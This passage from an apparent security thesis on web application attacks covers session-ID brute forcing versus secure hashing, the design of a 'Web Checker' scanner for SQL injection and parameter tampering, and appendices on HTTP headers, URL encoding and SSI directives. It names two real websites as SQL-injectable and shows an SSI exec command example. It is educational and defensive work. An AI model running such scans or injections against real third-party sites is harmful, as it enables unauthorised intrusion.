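    who knows roughly when the victim logged in can enumerate the candidates."""
    return hashlib.md5(f"{ip}:{int(when)}".encode()).hexdigest()


def enumerate_weak_ids(ip: str, around: float, window: int = 60) -> set:
    """What a hacker does against weak_session_id: brute-force the time window."""
    return {weak_session_id(ip, around + d) for d in range(-window, window + 1)}


def strong_session_id() -> str:
    """128 bits from the OS CSPRNG, URL-safe, derivable from nothing public."""
    return secrets.token_urlsafe(16)


def md5_password(password: str) -> str:
    """The storage the text warns about: unsalted and fast, so identical for
    every user with the same password and cheap to crack with a wordlist."""
    return hashlib.md5(password.encode()).hexdigest()


PBKDF2_ROUNDS = 600_000  # assumed policy: slow on purpose, raise as hardware improves


def hash_password(password: str) -> str:
    """Salted PBKDF2-HMAC-SHA256; the record carries everything needed to verify."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and rounds; compare in constant time."""
    _algo, rounds, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    login_time = 1_000_000_000.0
    victim = weak_session_id("10.0.0.5", login_time + 17)
    print("weak id found by brute force:", victim in enumerate_weak_ids("10.0.0.5", login_time))
    print("strong id:", strong_session_id())
    record = hash_password("hunter2")
    print("verify correct:", verify_password("hunter2", record))
    print("verify wrong:  ", verify_password("hunter3", record))
```

A 121-candidate search recovers the weak sessionID; no search is possible against the random one. The salt makes two records for the same password differ, defeating precomputed tables, and the iteration count makes each guess expensive, which is exactly what an unsalted MD5 does not do.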

III. FOR WEB APPLICATION USERS

Warn users of the risks of using the web, and in particular to be careful about letting the browser execute client-side scripts on their machine, since the scope for abusing these languages is large, as in the XSS and sessionID techniques. After finishing with an application, log out of the system in the prescribed way (for example Yahoo's Sign Out) so that the important content stored in cookies is destroyed and a hacker cannot keep using a still-valid session ID to log in as a legitimate user.

Account management: users must understand their own important role in protecting their accounts. This includes protecting the password, changing it periodically, noting login times, using protective software on their workstation, and logging out of the system after a time-out.
o Detecting unauthorized use of an account: users should be trained in how to tell that their account is being misused, and should regularly review their own activity to make sure nobody else is using the account for other actions.

Remarks:
Security is difficult and no system can ever be considered 100% safe, but if the three parties above cooperate fully the risks are reduced to a minimum. If any one of the three is missing, the system is permanently in an alarming state as far as safety is concerned.

PART THREE

THE WEB CHECKER PROGRAM

Chapter 13

THE WEB CHECKER PROGRAM

Contents:
I. Web Checker specification
II. Web Checker architecture
III. Implementation
IV. Evaluation of the program


I. WEB CHECKER SPECIFICATION

I.1. Overview

Web Checker is an application that illustrates some of the attack techniques presented above, namely SQL Injection, Form Field Manipulation and URL Manipulation, with SQL Injection as its focus. Following that idea, the program checks whether a web application is vulnerable to SQL injection, form field manipulation or URL manipulation. It takes the page to be checked from the user, automatically extracts the page's information and builds requests to send to the web server, then receives and analyses the responses to evaluate them and report to the user.

I.2. Requirements

From the ideas above, the application has the following requirements:

I.2.1. Functional requirements

+ Web browsing.
+ Checking for and detecting certain web application vulnerabilities:
  o SQL query injection (SQL Injection)
  o Manipulation of passed parameters (Parameter Manipulation)
+ Marking and reporting the results of the check.
+ Suggesting remedies for the vulnerabilities detected.


I.2.2. Non-functional requirements

+ Ease of use: the application must provide a clear, intuitive, easy-to-use interface.

II. WEB CHECKER ARCHITECTURE

II.1. Architecture

The program is divided into two layers.
Layer 1 (interface) is responsible for:
  o Browsing the web (supplying the page to be checked).
  o Displaying the results of the check.
Layer 2 (processing) is responsible for:
  o Retrieving the page requested for checking.
  o Building the test cases (combining the test data with information from the page and packaging it as an HTTP request) and sending them to the server.
  o Processing the server's replies to produce the results.

Figure 13.II.1-1: Layered architecture of the Web Checker application

II.2. Communication between the program and the web server

Communication between the application and the web server is client/server communication: the web server is the server and the application is the client, connecting to the server over a stream socket.

Figure 13.II.2-1: Communication between the application and the web server


III. IMPLEMENTATION
III.1. Implementation language
Web Checker uses the HTTP protocol to exchange information over the network. To keep the programming simple, the application should make use of the network programming libraries and ActiveX controls available in the development environment. Equally important, the language and environment chosen must be familiar, so that the application can be built quickly. For these reasons the thesis chose MS Visual C++ as the development environment.
System requirements:
  o Operating system: Windows XP, NT, 2000 or 9x with the TCP/IP protocol.
  o Network: an Internet connection, or a web server on the local machine.
  o Hardware: about 10 MB of free disk space.

III.2. Implementation approach
III.2.1. Dialog-based interface model
Because the application is designed for simplicity and ease of use it consists of a single screen, so the Dialog interface model was chosen.

III.2.2. Using an ActiveX control (Microsoft Web Browser)

The application uses the Microsoft Web Browser ActiveX control supplied with MS VC++ to provide the web browsing function. Through this browser the user supplies the page to be checked to the application.


III.2.3. Using the Windows Sockets 2 programming interface

The application uses the Windows Sockets 2 programming interface to implement a stream socket that connects to the web server.

III.2.4. Main classes and functions implemented in the program

The CCheckerDlg class

    class CCheckerDlg : public CDialog
    {
    public:
        void    getTestFile();                  // load the test patterns
        void    markChecked(CString &);         // mark the checked position in the page
        CString evaluateRslt(Result *);         // analyse the result
        void    scanWeb();                      // check the web page

        CArray <Result *, Result *> m_result;   // array holding the results
        CArray <Test *, Test *>     m_Test;     // array holding the test patterns
        bool    m_IsPost;                       // request type: POST or GET
        CString m_sData;                        // data for the request header
        CString m_HTTPbody;                     // body of the HTTP response
        CString m_HTTPreceive;                  // response header
        CString m_HTTPsend;                     // request header
        ...
    protected:
        // event handler for the embedded web browser control
        afx_msg void OnBeforeNavigate2Explorer(LPDISPATCH, VARIANT FAR*, VARIANT FAR*,
                                               VARIANT FAR*, VARIANT FAR*, VARIANT FAR*,
                                               BOOL FAR*);
    private:
        void Browse();                          // send/receive messages with the server
        void InsertHTML();                      // display the response as a web page
    };

Derived from CDialog; besides managing the dialog, the class has the following duties. It carries out the user's browsing requests through the Browse() method and displays the data in m_HTTPbody as a web page through InsertHTML(). The getTestFile() method reads the test patterns from a file when the program starts and stores them in the m_Test array. scanWeb() is the main method, called when the user presses the check button; it calls the other processing functions to test the page, analyse the responses and produce the results.

The Checker class

    class Checker
    {
    public:
        Checker();
        virtual ~Checker();
        void    inject(CString &, int, CString);   // insert a test pattern into the data
        CString getForumValue(int, CString, CString &, CString &, CString &);
                                                   // extract the data of a form
        CString getLinkValue(int, CString, CString &, CString &);
                                                   // extract the data of a link
        ...
    };

Defines the methods that extract the real data of the objects to be tested, the forms and links in the page; the program then injects each test pattern into that data through inject() and sends the result to the server.

The Request class

    class Request
    {
    public:
        Request();
        virtual ~Request();
        // if the request is GET, use the method supplied by the ActiveX control;
        // if it is POST, call SendHTTP
        void SendRequest(bool IsPost, LPCSTR url, CString &psHeaderSend,
                         CString &psHeaderReceive, CString &psMessage);
        ...
    private:
        // split a URL string into its parts
        void ParseURL(LPCSTR url, LPSTR protocol, int lprotocol, LPSTR host, int lhost,
                      LPSTR request, int lrequest, int *port);
        // open the connection, send the HTTP request and receive the HTTP response
        int  SendHTTP(LPCSTR url, LPCSTR headers, BYTE *post, DWORD postLength,
                      HTTPRequest *req);
    };

Defines the low-level methods that talk directly to the web server. SendHTTP is called through SendRequest() and Browse(); it opens the connection to the server, sends the request and receives the server's reply. The messages received are stored in the global variables m_HTTPsend, m_HTTPreceive and m_HTTPbody.

The Test class

    class Test
    {
    public:
        Test();
        virtual ~Test();
        CString m_errType;                    // vulnerability type
        CString m_errName;                    // vulnerability name
        CString m_strInject;                  // string to inject
        CArray <CString, CString> m_strRslt;  // response patterns that reveal the vulnerability
    };

Defines the test-pattern data type. The data is read from the file test.txt, whose records have the layout below; the characters \1 and \2 are field separators.

    <string to inject>\1<response pattern>\1<response pattern>\1 ... <error number>\2<error name>

For example:

    %27\1incorrect syntax\1unclosed quotation mark\1 ... 1\2SQL Injection
    ...

The first field is the string injected into the parameter, the following fields are the fragments that, if found in the response, indicate the vulnerability, then the error number and, after \2, the name of the vulnerability.

The Result class

    class Result
    {
    public:
        Result();
        virtual ~Result();
        CString m_object;                  // object tested
        int     m_ind;                     // position in the web page
        CString m_properties;              // properties of the object
        CArray <CString, CString> m_err;   // list of vulnerabilities found, if any
    };

Defines the result data type, which stores the test results for the page and is written to the program window, through the ShowResult() method, when the check of the page is complete.
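To make the scan loop described by these classes runnable, the Python below is added as an example; it is not the thesis's C++ code. It parses records in the test.txt layout given above (fields separated by \1 and \2), injects each pattern into every parameter of a URL, and matches the response against the record's patterns. The web server is replaced by a constructed function imitating a vulnerable ASP page and a safe one, so the example runs offline; the error text it returns is constructed in the style of the SQL Server OLE DB provider.

```python
"""Added example (not from the original thesis): the Web Checker test loop in
Python, with a constructed stand-in for the target web server."""
from dataclasses import dataclass, field
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode, unquote


@dataclass
class Test:
    inject: str           # string to inject, percent-encoded as in test.txt
    patterns: list        # response fragments that reveal the vulnerability
    err_no: int
    err_name: str


@dataclass
class Result:
    obj: str                                  # parameter that was tested
    errs: list = field(default_factory=list)  # vulnerabilities found


# Constructed test.txt content in the layout described above.
TEST_FILE = "%27\x01incorrect syntax\x01unclosed quotation mark\x011\x02SQL Injection\n"


def parse_tests(text: str) -> list:
    """One record per line: inject\\1pattern\\1...\\1err_no\\2err_name."""
    tests = []
    for line in text.splitlines():
        if not line.strip():
            continue
        head, name = line.split("\x02", 1)
        fields = head.split("\x01")
        tests.append(Test(fields[0], [p for p in fields[1:-1] if p], int(fields[-1]), name))
    return tests


def inject(url: str, param: str, payload: str) -> str:
    """Append the decoded payload to one parameter and rebuild the URL."""
    parts = urlsplit(url)
    pairs = [(k, v + unquote(payload) if k == param else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(pairs)))


def fake_server(url: str) -> str:
    """Constructed target: show.asp concatenates 'id' into its SQL and leaks the
    database error; safe.asp behaves as if it used a parameterised query."""
    parts = urlsplit(url)
    params = dict(parse_qsl(parts.query))
    if parts.path.endswith("/show.asp") and "'" in params.get("id", ""):
        return ("Microsoft OLE DB Provider for SQL Server error '80040e14'\n"
                "Unclosed quotation mark before the character string ''.")
    return "<html><body>article</body></html>"


def scan(url: str, tests: list, fetch=fake_server) -> list:
    """For every parameter in the URL, send each test pattern and record the
    vulnerabilities whose response patterns appear in the reply."""
    results = []
    for name, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        result = Result(name)
        for test in tests:
            body = fetch(inject(url, name, test.inject)).lower()
            if any(p.lower() in body for p in test.patterns):
                result.errs.append(test.err_name)
        results.append(result)
    return results


if __name__ == "__main__":
    tests = parse_tests(TEST_FILE)
    for r in scan("http://example.test/show.asp?id=5", tests):
        print(r.obj, "->", r.errs or "safe")
```

Passing a real HTTP fetcher as `fetch` turns the same loop into a live scanner; the signature-matching approach is also why the program has the limitation noted in section IV.2 below: it recognises only responses that look like the patterns in test.txt.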


III.3. DESCRIPTION OF THE PROGRAM AND ITS USE
III.3.1. Program screen

Figure 13.III.3.1-1: Components of the program screen

The application screen has three main parts:
+ Web browser: like an ordinary browser, it opens the page to be checked and shows the results by marking, directly at each tested position in the page, whether that position is safe or unsafe.


+ Results: lists the results of the check, that is, which positions are safe or unsafe and which vulnerabilities each unsafe position has.
+ Advice: if a vulnerability is found, selecting its name in the results pane shows how to prevent it.

III.3.2. Usage

The user types an address or follows links to the page to be checked, then presses the check button. The program displays the results and advice on preventing the vulnerabilities found.

Figure 13.III.3.2-1: Results screen


The program marks the tested positions directly in the page (green for a safe position; a second colour for an unsafe one).

IV. Evaluation of the program

Results achieved and limitations of the program after testing on a virtual network and on the Internet:

IV.1. Results achieved

+ The program frequently detects security flaws such as SQL Injection, Form Field Manipulation and URL Manipulation in web applications on the Internet, illustrating the theory behind those techniques.
+ The results are shown clearly and visually at each tested position.
+ Suggested countermeasures are given for each vulnerability found.

Example 13.IV.1-1: the program detected an SQL injection vulnerability in the web application at www.progenic.com; specifically, the links to news content did not validate their input:
http://www.progenic.com/out/?id=5 ...

IV.2. Limitations

Because it relies on the fairly simple mechanism of sending test inputs and evaluating the response, the program cannot detect complex security flaws. Its effectiveness is low against applications with unusual designs.


Example 13.IV.2-1: the program failed to find the flaw in the web application at www.thanglongmetalwares.com/sanpham.asp even though it is vulnerable to SQL injection. The cause is that the application stores the SQL query itself in form fields, so when the program tests the form it alters the query and thereby changes the application's behaviour, and the expected error signatures never appear. Shipping the query in a hidden field is of course itself the flaw: a hacker can replace strSQL with any statement at all.

    <form method="post" action="Sanpham.asp" name="Sanpham">
      <input type="hidden" name="strSQL" value="SELECT * FROM Products Where Language = 1 ORDER BY Date DESC">
      <input type="hidden" name="Page" value="1">
      ...

CONCLUSION

Contents:
I. Results achieved
II. Future work


I. RESULTS ACHIEVED
Against the original requirement, Research into attack techniques and web application security, the thesis has so far achieved the following:
+ A study of the web application attack techniques, including:
  o Manipulation of passed parameters: URL, hidden form fields, cookies, HTTP headers.
  o Client-side code injection: Cross-site Scripting.
  o SQL query injection.
  o Hijacking a user's session.
  o Buffer overflow.
  o Denial of service.
  o Other techniques: URL encoding, path traversal, null bytes, server-side languages (SSI).
+ Security measures drawn from the cooperation of the network administrator, the web application designer and the user.
+ The Web Checker program, which achieves the following basics:
  o Checks whether a page can be attacked by SQL injection or parameter tampering.
  o Lets the user communicate with the web server as with an ordinary browser.


II. FUTURE WORK

Within the scope of an undergraduate thesis, the work has essentially met the requirements set, though the results remain modest because of limited literature and time. In the future, given the opportunity, the thesis could be extended as follows:
+ Study further attack techniques and propose web application security measures in more depth.
+ Study security more broadly, not only at the level of a single web application but also of network systems and services.
+ Improve the vulnerability-detection program on more technical fronts.
+ Develop the program as a proxy between the web server and browsers: every request from a browser and every reply from the server passes through the program, and whenever the program detects a possible attack from the browser it rejects the request and closes the connection.


APPENDIX
Contents:
A. HTTP headers
B. URL encoding
C. Server Side Includes


Appendix A: HTTP HEADERS

General headers, usable in both HTTP requests and HTTP responses:

    Name                  Example value
    Cache-Control         max-age=10
    Connection            Close
    Date                  Tue, 11 Jul 2000 18:23:51 GMT
    Pragma                no-cache
    Trailer               Date
    Transfer-Encoding     Chunked
    Upgrade               SHTTP/1.3
    Via                   HTTP/1.1 Proxy1, HTTP/1.1 Proxy2
    Warning               112 Disconnected Operation

Headers usable only in HTTP requests:

    Name                  Example value
    Accept                text/html, image/*
    Accept-Charset        iso8859-5
    Accept-Encoding       gzip, compress
    Accept-Language       en, fr
    Authorization         [credentials]
    Content-Encoding      Gzip
    Expect                100-continue
    From                  user@microsoft.com
    Host                  www.microsoft.com
    If-Match              entity_tag001
    If-Modified-Since     Tue, 11 Jul 2000 18:23:51 GMT
    If-None-Match         entity_tag001
    If-Range              entity_tag001 or Tue, 11 Jul 2000 18:23:51 GMT
    If-Unmodified-Since   Tue, 11 Jul 2000 18:23:51 GMT
    Max-Forwards          3
    Proxy-Authorization   [credentials]
    Range                 Bytes=100-599
    Referer               http://www.microsoft.com/resources.asp
    TE                    trailers
    User-Agent            Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)

Headers usable only in HTTP responses:

    Name                  Example value
    Accept-Ranges         None
    Age                   2147483648 (2^31)
    ETag                  b38b9-17dd-367c5dcd
    Last-Modified         Tue, 11 Jul 2000 18:23:51 GMT
    Location              http://localhost/redirecttarget.asp
    Proxy-Authenticate    [challenge]
    Retry-After           Tue, 11 Jul 2000 18:23:51 GMT or 60
    Server                Microsoft-IIS/5.0
    Vary                  Date
    WWW-Authenticate      [challenge]

Entity headers, usable in both requests and responses; they describe the message body, for example the encoding used:

    Name                  Example value
    Allow                 GET, HEAD
    Content-Encoding      Gzip
    Content-Language      En
    Content-Length        8445
    Content-Location      http://localhost/page.asp
    Content-MD5           [md5-digest]
    Content-Range         Bytes 2543-4532/7898
    Content-Type          text/html
    Expires               Tue, 11 Jul 2000 18:23:51 GMT
    Last-Modified         Tue, 11 Jul 2000 18:23:51 GMT


Appendix B: URL ENCODING

Each byte is written as % followed by its two hexadecimal digits.

    Character             Hex code
    control characters    %00 to %1f (backspace %08, tab %09, linefeed %0a, carriage return %0d)
    space                 %20
    !                     %21
    "                     %22
    #                     %23
    $                     %24
    %                     %25
    &                     %26
    '                     %27
    (                     %28
    )                     %29
    *                     %2a
    +                     %2b
    ,                     %2c
    -                     %2d
    .                     %2e
    /                     %2f
    0 to 9                %30 to %39
    :                     %3a
    ;                     %3b
    <                     %3c
    =                     %3d
    >                     %3e
    ?                     %3f
    @                     %40
    A to Z                %41 to %5a
    [                     %5b
    \                     %5c
    ]                     %5d
    ^                     %5e
    _                     %5f
    `                     %60
    a to z                %61 to %7a
    {                     %7b
    |                     %7c
    }                     %7d
    ~                     %7e
    delete                %7f
    non-ASCII bytes       %80 to %ff

Appendix C: SERVER SIDE INCLUDES

SSI directives fall into two groups:
+ Directives
+ Control directives

Directives

CONFIG
    Example:     <!--#config sizefmt="bytes" -->
    Parameters:  sizefmt, datefmt
    Meaning:     controls the format of file sizes and dates

COOKIE
    Example:     <!--#cookie if="C1" then="hello" alt="bye"-->
    Parameters:  get, alt, if, then
    Meaning:     reads a cookie on the server

COUNT
    Example:     <!--#hitcount -->
    Meaning:     total number of connections (hit counter)

ECHO
    Example:     <!--#echo reqheader="referer" -->
    Parameters:  var, reqstate, reqheader, here
    Meaning:     displays a request header or a variable

EXEC
    Example:     <!--#exec cmd="ls -lsa" -->
    Parameters:  cmd
    Meaning:     executes a command

FLASTMOD
    Example:     <!--#flastmod-->
    Meaning:     last modification date of the file

FSIZE
    Example:     <!--#fsize -->
    Meaning:     size of the file

INCLUDE
    Example:     <!--#include file="included.html" -->
    Parameters:  file, virtual, ifheader, else
    Meaning:     inserts a file into the current page

JDBC
    Example:     <!--#jdbc select="SELECT * FROM User" ... -->
    Parameters:  select, url, name, column, next, driver, password, user
    Meaning:     executes a database query

SERVLET
    Example:     <!--#servlet name="Snoop" param="p1" value="v1" -->
    Meaning:     runs a servlet with the given parameters

Control directives

COUNTER
    Parameters:  name

ELSE
    Example:     <!--#else name="if2" -->
    Parameters:  name

ENDIF
    Example:     <!--#endif name="if2" -->
    Parameters:  name

ENDLOOP
    Example:     <!--#endloop name="loop2" -->
    Parameters:  name

EXITLOOP
    Example:     <!--#exitloop name="loop2" command="cpt" var="cpt1" equals="4" -->
    Parameters:  name, command, var, equals

IF
    Example:     <!--#if name="if2" command="cpt" var="cpt1" equals="2" -->
    Parameters:  name, command, var, equals

LOOP
    Example:     <!--#loop name="loop2" -->
    Parameters:  name


REFERENCES

Hacking Exposed, Stuart McClure, Joel Scambray, George Kurtz.
RFC 2617, HTTP Authentication: Basic and Digest Access Authentication, J. Franks, P. Hallam-Baker, J. Hostetler, S. Lawrence, P. Leach, A. Luotonen, L. Stewart, June 1999.
http://www.sqlsecurity.com/
http://www.nextgenss.com/papers/
http://www.owasp.org/
http://www.4guysfromrolla.com/webtech/
http://www.guardent.com/
http://www.idefense.com/
http://www.jmu.edu/computing/info-security/engineering/issues/
http://www.microsoft.com/technet/support/
http://www.microsoft.com/technet/security/
http://community.whitehatsec.com/
http://www.codeproject.com/
